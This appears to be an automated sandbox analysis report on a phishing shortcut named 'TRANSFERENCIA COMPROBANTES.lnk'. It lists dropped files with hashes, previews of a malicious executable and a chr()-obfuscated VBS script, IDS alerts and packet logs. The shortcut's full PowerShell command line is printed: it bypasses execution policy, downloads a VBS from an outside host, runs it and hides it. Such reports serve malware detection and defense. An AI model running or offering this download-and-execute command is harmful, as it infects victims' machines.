                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                                                                                MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                                                                                SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                                                                                SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                                                                                SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Word 2007+
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):3465076
                                                                                                                                                Entropy (8bit):7.898517227646252
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:98304:n8ItVaN7vTMZ9IBbaETXbI8ItVaN7vTMZ9IBbaEiXbY:8ItwNX9BvTvItwNX9BvoM
                                                                                                                                                MD5:8BC84DB5A3B2F8AE2940D3FB19B43787
                                                                                                                                                SHA1:3A5FE7B14D020FAD0E25CD1DF67864E3E23254EE
                                                                                                                                                SHA-256:AF1FDEEA092169BF794CDC290BCA20AEA07AC7097D0EFCAB76F783FA38FDACDD
                                                                                                                                                SHA-512:558F52C2C79BF4A3FBB8BB7B1C671AFD70A2EC0B1BDE10AC0FED6F5398E53ED3B2087B38B7A4A3D209E4F1B34150506E1BA362E4E1620A47ED9A1C7924BB9995
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:PK.........Y5B................[Content_Types].xml ...(.................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.....g.../i..b../..}.-......U.....o.7B.......}@[..4o...E9n..h...Y....D.%......F....g..-!.|p.....7.pQVM.....B.g.-.7....:...d.2...7bA..Us.z.`.r..,.m."..n....s.O^.....fL.........7.....-...gn,J..iU..$.......i...(..dz.....3|

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):24
                                                                                                                                                Entropy (8bit):2.9993896755123957
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:QDOLRMlW8Gn:Q6VMlW8G
                                                                                                                                                MD5:01FBC8EAAB7AC6E4BAE9C8BFF8577681
                                                                                                                                                SHA1:230A2E20F1CAFBEDDE01063CBA0FB40C81D1C966
                                                                                                                                                SHA-256:867B47C3C977F07C1905B3FBC883983FDF02E7F389AE7FA999B3CFCA7F5A2867
                                                                                                                                                SHA-512:AB1021D58DB2E32AA2137E399594609C65BD08D9A25FDDCD3E7028FF8989B6F42725C07CB443645D7916B2740989A83237359C242883E1EFC6E05E3FA989CABD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..f.r.o.n.t.d.e.s.k.....

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LGYYE10FC0448L763BVO.temp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5388
                                                                                                                                                Entropy (8bit):3.4341815626933703
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:sqaWqJpmo9JUJlbrYvpl6KSogZohJgJa7rYvplJKSogZohJgJO1:+TMvrYvpuHqrYvpHHK
                                                                                                                                                MD5:5E5064DC720900A59E8DA4A8A477554B
                                                                                                                                                SHA1:0AEAD6D4C536781919FA36CD8E913EDB310DA76D
                                                                                                                                                SHA-256:6966613A2E70F09CD8AFE2160EB8EF6081F600FDB228F3CFF62175115DCD92AB
                                                                                                                                                SHA-512:6DC496C1AF339C7C056ECC279636A051ADA90C8C3880594543FD17982927522A65F9890006DE12F910AC38761E31582349F87CC790884CB9C3B08DA878B4BB1F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:...................................FL..................F.`.. ......2a.....V..I.......I...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_....7.3a.....V..I......2......Y.. .TRANSF~1.LNK..n......EW.>.Y............................>...T.R.A.N.S.F.E.R.E.N.C.I.A. .C.O.M.P.R.O.B.A.N.T.E.S...l.n.k.......h...............-.......g...........>}hD.....C:\Users\user\Desktop\TRANSFERENCIA COMPROBANTES.lnk....c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.o.n.s.e.n.t...e.x.e.........%SystemRoot%\system32\consent.exe...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.c.o.n.s.e.n.t...e.x.e.......................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ac0e219dd9305460.customDestinations-ms (copy)

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):5388
                                                                                                                                                Entropy (8bit):3.4341815626933703
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:48:sqaWqJpmo9JUJlbrYvpl6KSogZohJgJa7rYvplJKSogZohJgJO1:+TMvrYvpuHqrYvpHHK
                                                                                                                                                MD5:5E5064DC720900A59E8DA4A8A477554B
                                                                                                                                                SHA1:0AEAD6D4C536781919FA36CD8E913EDB310DA76D
                                                                                                                                                SHA-256:6966613A2E70F09CD8AFE2160EB8EF6081F600FDB228F3CFF62175115DCD92AB
                                                                                                                                                SHA-512:6DC496C1AF339C7C056ECC279636A051ADA90C8C3880594543FD17982927522A65F9890006DE12F910AC38761E31582349F87CC790884CB9C3B08DA878B4BB1F
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:...................................FL..................F.`.. ......2a.....V..I.......I...............................P.O. .:i.....+00.:...:..,.LB.)...A&...&........*_....7.3a.....V..I......2......Y.. .TRANSF~1.LNK..n......EW.>.Y............................>...T.R.A.N.S.F.E.R.E.N.C.I.A. .C.O.M.P.R.O.B.A.N.T.E.S...l.n.k.......h...............-.......g...........>}hD.....C:\Users\user\Desktop\TRANSFERENCIA COMPROBANTES.lnk....c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2.\.c.o.n.s.e.n.t...e.x.e.........%SystemRoot%\system32\consent.exe...................................................................................................................................................................................................................................%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.c.o.n.s.e.n.t...e.x.e.......................................................................................................................................................................

                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):177664
                                                                                                                                                Entropy (8bit):7.757333394091002
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:/Qv8/m8hRr4ZWmhtRGKTCaWzUp0jxrZmHM26XF1g39JZY6Rd:/k83r4MmhvGKTpa1tXUJLd
                                                                                                                                                MD5:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                SHA1:03F03C5B5D8CF362AA52B9E793E7BE398D779C21
                                                                                                                                                SHA-256:639135EB69333ABA7ECB762072D8BEF1D2DB83E54EDBE627DD223039142B8C91
                                                                                                                                                SHA-512:74048463606F7017BD8BD3C92773EDDE5A406247C5EA437B8EE580A3D9E65EB755AA44DE466FC2AABEF8B9A67C40163AFEB3DF9BC9FB35F8AFE20814D5DE85B5
                                                                                                                                                Malicious:true
                                                                                                                                                Joe Sandbox View:
                                                                                                                                                • Filename: TRANSFERENCIA COMPROBANTES.lnk, Detection: malicious, Browse
                                                                                                                                                • Filename: Transferencia.lnk, Detection: malicious, Browse
                                                                                                                                                • Filename: dHrrqccwkL.doc, Detection: malicious, Browse
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....sVg................................ ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......0a..h\..........................................................f#........X...B..4.d........r.).#..P..J. Og$..7&.\....Y^.._..H...f..+..........k.....&.*!g..>Y...O=x........&L.8.Y....1........I.D9p.QR..I..Z.-%.].-.'.z..P....."..$........j,..AHz...5..6..7.'.....Li$.^u\F.X.....V2..^.....*#^.X.u@.p...^....' .r.dQ..xR..v>u.C.m8.....>)..0lk.E...#..3a..u...:........[7..Z.w#....'F..r..N.s....X.Z...bl.......1.;..*..D.JA-d....G..(..|.N.q.W.|.U...X

                                                                                                                                                C:\Users\user\AppData\Roaming\UpdateManager\GFKMTE.exe

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GFKMTE.exe
                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):177664
                                                                                                                                                Entropy (8bit):7.757333394091002
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:/Qv8/m8hRr4ZWmhtRGKTCaWzUp0jxrZmHM26XF1g39JZY6Rd:/k83r4MmhvGKTpa1tXUJLd
                                                                                                                                                MD5:94A7E3859C2E4238421CDFE73D49603C
                                                                                                                                                SHA1:03F03C5B5D8CF362AA52B9E793E7BE398D779C21
                                                                                                                                                SHA-256:639135EB69333ABA7ECB762072D8BEF1D2DB83E54EDBE627DD223039142B8C91
                                                                                                                                                SHA-512:74048463606F7017BD8BD3C92773EDDE5A406247C5EA437B8EE580A3D9E65EB755AA44DE466FC2AABEF8B9A67C40163AFEB3DF9BC9FB35F8AFE20814D5DE85B5
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....sVg................................ ........@.. ....................................`.....................................S.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......0a..h\..........................................................f#........X...B..4.d........r.).#..P..J. Og$..7&.\....Y^.._..H...f..+..........k.....&.*!g..>Y...O=x........&L.8.Y....1........I.D9p.QR..I..Z.-%.].-.'.z..P....."..$........j,..AHz...5..6..7.'.....Li$.^u\F.X.....V2..^.....*#^.X.u@.p...^....' .r.dQ..xR..v>u.C.m8.....>)..0lk.E...#..3a..u...:........[7..Z.w#....'F..r..N.s....X.Z...bl.......1.;..*..D.JA-d....G..(..|.N.q.W.|.U...X

                                                                                                                                                C:\Users\user\Desktop\pafdfgz.vbs

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                File Type:ASCII text, with very long lines (10361), with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):10363
                                                                                                                                                Entropy (8bit):4.215183366705786
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:5yOUEFQdd+BHBHtuQoBkUfIk93lGQNdsFu/0nymvsWk+HvzES5Rm5aVK+8:5hF68GH5RlGQsFu/fkMYv8
                                                                                                                                                MD5:087BCEF76143B81090DEEF4EE4679995
                                                                                                                                                SHA1:6EBD4FD212D0583157AE03BB0EB5841C53E281FC
                                                                                                                                                SHA-256:87334EB3F39CFFDFEED453F67A7C338FE378B75C49946451CA1A0E4E151BBA00
                                                                                                                                                SHA-512:B2F93705760D4D1CF5FE0AC354100916D16B6C4FD62117254238A600AABE6257FC791F1CE498BD2D0CFDD47E19F304DC5A68A06B7958658F34859AFAA582ED4D
                                                                                                                                                Malicious:true
                                                                                                                                                Preview:Execute(chr(49+34)& chr(195-94)& chr(166-50)& chr(129-97)& chr(194-83)& chr(11+87)& chr(133-27)& chr(105-18)& chr(5670/54)& chr(174-64)& chr(7+65)& chr(4060/35)& chr(60+56)& chr(16*7)& chr(116-84)& chr(2013/33)& chr(-48+80)& chr(10+57)& chr(5814/51)& chr(24+77)& chr(117-20)& chr(190-74)& chr(7070/70)& chr(4661/59)& chr(170-72)& chr(121-15)& chr(70+31)& chr(41+58)& chr(7656/66)& chr(8+32)& chr(19+15)& chr(71+16)& chr(5355/51)& chr(173-63)& chr(25+47)& chr(41+75)& chr(72+44)& chr(8624/77)& chr(99-53)& chr(130-43)& chr(190-85)& chr(83+27)& chr(-27+99)& chr(147-31)& chr(33+83)& chr(206-94)& chr(4182/51)& chr(110-9)& chr(182-69)& chr(5850/50)& chr(116-15)& chr(61+54)& chr(74+42)& chr(-47+93)& chr(147-94)& chr(43+3)& chr(72-23)& chr(272/8)& chr(1*41)& chr(600/60)& chr(103-18)& chr(169-87)& chr(1748/23)& chr(-60+92)& chr(793/13)& chr(1600/50)& chr(-57+91)& chr(22+82)& chr(2*58)& chr(183-67)& chr(13+99)& chr(211-96)& chr(122-64)& chr(10+37)& chr(83-36)& chr(6664/56)& chr(10234/86)& chr(8449/71

                                                                                                                                                C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                                                Download File
                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                File Type:JSON data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):55
                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                                                Static File Info

                                                                                                                                                General

                                                                                                                                                File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=0, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                                                                                                Entropy (8bit):2.815973144862974
                                                                                                                                                TrID:
                                                                                                                                                • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                File name:TRANSFERENCIA COMPROBANTES.lnk
                                                                                                                                                File size:2'498 bytes
                                                                                                                                                MD5:e03e7eeb288c1f96bb336fe0bfa4cb95
                                                                                                                                                SHA1:e2a53c23480aad659723ee5c8542105955787ac1
                                                                                                                                                SHA256:a43b59c54921c6b5cc272e0af9917b5973231de9b6d183be381c1820416ce49f
                                                                                                                                                SHA512:c142377b9ad169f06e62836c4152b916bfff5b4d64487005fcca5dc2d213a9aeaa5a8d6d2fcfbbbbc13b6016aaf9c4ff0b108cff3af98d28cc85d1502478ce2a
                                                                                                                                                SSDEEP:24:8z/BHYVKVWTAZ/+/CWd0G2z2EDe2PE+rmIKvrhV9QOfe4o0t5/:8z5aMFz2IeOE+fKv9V9QmoI
                                                                                                                                                TLSH:C451F71429F51718F6F78F392879A350C876BD59FD66CB8C0150818C2C21710E9B5F3B
                                                                                                                                                File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74f0e4e4e4e1e1ed

                                                                                                                                                Static Windows Shortcut Info

                                                                                                                                                General

                                                                                                                                                Relative Path:..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                Command Line Argument:-ExecutionPolicy Bypass zhdfboopntjfmdjtgfdjqbinrdfgfdho -WindowStyle -Command hiddeN consent.exe;(new-object System.Net.WebClient).DownloadFile('https://www.stipamana.com/vbsznjgzfzgolnzdgh/tydthcgfhjdfhsfghxffsjhx/vbfdhydjyfjfxhgjhxgh/pafdfgzdf.vbs','pafdfgz.vbs');./'pafdfgz.vbs';(get-item 'pafdfgz.vbs').Attributes += 'Hidden';
                                                                                                                                                Icon location:c:\windows\system32\consent.exe

                                                                                                                                                Network Behavior

                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                2024-12-09T06:52:28.060737+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74970194.156.167.57443TCP
                                                                                                                                                2024-12-09T06:52:37.409124+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.74972852.123.243.181443TCP

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 9, 2024 06:52:24.139980078 CET49699443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:24.140050888 CET4434969994.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:24.140141010 CET49699443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:24.150913000 CET49699443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:24.150945902 CET4434969994.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:25.954137087 CET4434969994.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:25.954222918 CET49699443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:25.959665060 CET49699443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:25.959683895 CET4434969994.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:25.959937096 CET4434969994.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:25.986274004 CET49699443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:26.031332970 CET4434969994.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:26.434945107 CET4434969994.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:26.434972048 CET4434969994.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:26.435020924 CET4434969994.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:26.435039997 CET4434969994.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:26.435039043 CET49699443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:26.435091019 CET49699443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:26.440182924 CET49699443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:26.695108891 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:26.695149899 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:26.695221901 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:26.696458101 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:26.696470022 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.060497046 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.060736895 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:28.062213898 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:28.062222004 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.062510014 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.104887962 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:28.113426924 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:28.155340910 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.773081064 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.773108006 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.773121119 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.773133039 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.773161888 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.773178101 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:28.773200989 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.773252964 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:28.773284912 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:28.827442884 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.827462912 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.827533007 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:28.827553988 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.827635050 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:28.977379084 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.977406979 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.977485895 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:28.977514029 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:28.977569103 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.019488096 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.019511938 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.019593000 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.019615889 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.019711971 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.045295000 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.045315027 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.045366049 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.045388937 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.045408964 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.045424938 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.157156944 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.157186985 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.157238960 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.157265902 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.157294989 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.157318115 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.175908089 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.175930023 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.175997019 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.176002979 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.176042080 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.196603060 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.196633101 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.196693897 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.196700096 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.196738005 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.215128899 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.215151072 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.215209961 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.215217113 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.215276003 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.229198933 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.229226112 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.229285002 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.229311943 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.229455948 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.242258072 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.242278099 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.242337942 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.242345095 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.242482901 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.352291107 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.352314949 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.352385044 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.352396011 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.352454901 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.354020119 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.354079008 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.354084015 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.354099035 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.354119062 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.354152918 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.354192019 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.354207039 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:29.354228020 CET49701443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:29.354233027 CET4434970194.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:35.063589096 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:35.063630104 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:35.063697100 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:35.065378904 CET49727443192.168.2.794.156.167.57
                                                                                                                                                Dec 9, 2024 06:52:35.065402031 CET4434972794.156.167.57192.168.2.7
                                                                                                                                                Dec 9, 2024 06:52:35.313007116 CET49728443192.168.2.752.123.243.181
